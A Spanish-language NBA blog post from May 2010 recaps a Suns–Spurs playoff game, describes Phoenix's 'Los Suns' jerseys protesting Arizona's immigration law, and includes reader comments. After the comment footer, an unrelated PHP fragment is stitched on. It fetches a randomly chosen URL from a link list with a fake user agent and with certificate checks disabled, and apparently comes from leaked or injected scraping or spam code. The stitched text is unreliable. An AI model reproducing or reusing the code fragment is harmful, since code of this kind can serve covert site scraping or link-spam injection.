Playoffs 05/05/2010: Canción protesta

06 de May de 2010 por TheDeerHunter

No suele ser habitual la vinculación entre deporte y política. Los jugadores no son muy dados a comprometerse, en ocasiones, por muy buenas razones. Normalmente no están suficientemente capacitados para posicionarse en según qué temas y, por otro lado, el púlpito que utilizan no les es dado precisamente gracias a sus valores sociales ni a lo modélico que puedan ser. El caso es que la línea es muy fina entre el acto loable y lo despreciable en estos jardines.

Sea como sea y sin entrar a valorarlo, la franquicia de Phoenix decidió vestir unánimamente en su partido de anoche la zamarra de “Los Suns” (en lugar del habitual Suns a secas) como homenaje a la populosa comunidad latina que vive en Arizona a colación del aniversario de La batalla de La Puebla, y también como protesta frente a la nueva ley estatal de inmigración. La idea pareció tan buena que los Spurs estuvieron a punto de adherirse a ella. No lo hicieron por falta de tiempo para montarlo.

En este ambiente institucional-reivindicativo (qué raras suenan las dos palabras juntas), que tuvo eco hasta en la misma Casa Blanca, vimos un partido precioso, típico de playoffs. Los Spurs empezaron mandando, defendiendo muy fuerte (redujeron el porcentaje de tiro de los Suns hasta el 42% – 8 tapones) y controlando bien el tempo sin dejar a sus rivales correr mucho. Al buen hacer del trío sempiterno Parker-Ginobili-Duncan se unía una muy buena contribución tanto de George Hill, como de Richard Jefferson. Ante tales condiciones nadie hubiera podido imaginar que los Spurs podían perder un partido, y sin embargo lo hicieron.

Defendieron bien, sí, pero el rebote les mató. Hasta 18 rebotes ofensivos cedieron a los jugadores de los Suns, y no específicamente a los pívots. Creo que Popovic va a volver a impartir a estas alturas las lecciones más básicas del baloncesto: cerrar el rebote. Además, ayer tocaba el partido superlativo que hace cada serie Channing Frye, acribillándoles con un 5 de 6 en triples, más un inmenso Grant Hill, tanto en su marca sobre Ginobili, como en ataque haciendo de hombre orquesta. El jugador favorito de Gentry, según él mismo. Fueron de menos a más, ajustando su ataque como muchos no esperábamos de este equipo. Grande Stoudemire, grande Nash (¿cuánto le deberá el primero al segundo?), grande Richardson y grande Dudley. Pinta, como mínimo, de finalistas de Conferencia y después, a ver qué pasa.

En cualquier caso ahora toca viajar a San Antonio. Para ganar allí como visitantes hay que ser muy buenos. Vamos a ver cómo son realmente de buenos estos Suns de Alvin Gentry.

PREMIOS

MVP: Grant Hill… ¿por qué eres TAN bueno? 18 puntos, 6 rebotes no son, a priori, números de estrella de la liga pero lo son más permitiendo anotar a Ginobili tan sólo 11 puntos. Y más aún si en tu carnet de identidad pone que tienes 37 años.

El rookie: No os voy a engañar, esperaba mucho más de Blair a estas alturas.

La sorpresa: Frye es el factor X de los Suns estos playoffs. Anoche 5 de 6 en triples, 15 puntos y victoria al bolsillo.

La decepción: McDyess sólo 3 rebotes en 22 minutos de juego y Bonner 0 puntos. Buena parte de los problemas de los Spurs vienen por no contar con un interior solvente al lado de Duncan. Y eso que Robin López no vuelve, de momento.

El mayor esfuerzo en vano: Tim Duncan se salió por todos lados. 29 puntos, 10 rebotes, 2 tapones. Con una actuación así de un tío así es tan difícil perder un partido…

Y MAÑANA…

Segundo partido de la serie Orlando-Atlanta si es que se considera que se jugó el primero. Otra victoria la mitad de clara que la primera de los de Florida y la barrida planeará sobre las cabezas de los aficionados de los Hawks.

Comenta

8 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Genial título para una gran crónica. ¡¡Víctor Jara Rules!! La vida es eterna en cinco minutos, jeje.

      Citar

  2. LEmontus dice:
    #2

    Serie mala esta, no me llama nada

      Citar

  3. kantonyo dice:
    #3

    Phoenix Suns está siendo el gran tapado de la liga. Pocos contaban con ellos para playoffs, y muy poco se ha hablado de ellos durante la temporada. Tanto Stoudemire como Richardson está jugando a gran nivel, dos jugadores que ultimamente se les ha criticado bastante.

    Sería todo un éxito llegar a las finales de la conferencia.

      Citar

  4. Mariano dice:
    #4

    Van a pasar los Spurs, luego de ganar los 2 partidos que vienen en texas.. le arrebatan el 5to juego y definen de local.. otro 4-2 para sus eternos hijos..

    Mi pronostico 😉 jaaj

    Buena nota por cierto..

      Citar

  5. sayim dice:
    #5

    “Apoyamos a la comunidad latina. Son parte de las 12 tribus de Israel. Una nación bajo un Dios. Shalom”, Amarè dixit. Esto del twitter deja a alguno a la altura del betún…
    Menos mal que juega al lado de un maestro, el día que se separen Stoudemire no vuelve a jugar un All star

    Un saludo

      Citar

  6. Txusma dice:
    #6

    A lo Kenyon Martin con Jason Kidd?

      Citar

  7. TheDeerHunter dice:
    #7

    Pues no lo he comentado en la crónica… pero no sé donde he leído que durante su serie particular contra los Spurs esta temporada (partidos de regular más estos dos últimos) Amaré no ha sido capaz de realizar un solo mate cuando no ha coincidido en pista con Nast… con la consiguiente merma en sus porcentajes de tiro.

    De todas formas no creo que el panorama sea similar para Stat que para Martin.

      Citar

  8. aro_pasado_no_newtoniano dice:
    #8

    Genial el título.

    Nash MVP.

    Tremendous Stat.

    Nash MVP.

    ¿Por qué no “The Soles”?

    Ojalá salga el ganador de la NBA de esta serie.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>